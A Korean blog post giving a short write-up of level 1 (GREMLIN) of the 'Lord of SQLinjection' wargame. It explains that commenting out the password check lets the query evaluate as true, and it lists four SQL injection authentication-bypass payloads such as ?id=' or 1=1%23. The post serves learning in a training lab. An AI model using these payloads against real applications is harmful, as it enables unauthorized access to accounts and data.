Lord of Sqlinjection - 1번 GREMLIN

IT Security

로픽 2019. 11. 18. 14:25

제시된 query에서 where id='' and pw='' 구문을 참으로 만들면 정답을 맞출 수 있습니다.

$_GET[id], $_GET[pw]를 통해서 2개의 파라미터를 받지만 '#' 이나 '--'으로 이어지는 구문을 생략할 수 있으므로

id 파라미터만 채워도 문제를 해결할 수 있습니다.

* 정답 *

(%23 = #)

?id=' or 1=1%23

?id=' or 'x'='x'%23

?id=' || True%23

?id=' || 1%23

Lord of Sqlinjection - 3번 GOBLIN (0)	2019.11.19
Lord of Sqlinjection - 2번 COBOLT (0)	2019.11.18
정보보안 ) EDR 솔루션 (0)	2019.10.30
정보보안 ) Malware 뉴크스페드(NukeSped) (0)	2019.10.28
정보보안 ) 파워쉘(PowerShell) (0)	2019.10.28

IT 정보 & Tip 을 포스팅하고 있습니다.

Java, 패킷트레이서, Blender, 어플, 네트워크, 정보기기운용기능사, 안드로이드, 블렌더, 자바, 정보보안, C언어, 자격증, 파이썬, Android, python, 라우터, 안드로이드 어플, AWS, 프로그래밍 언어, 리눅스,

로픽의 IT블로그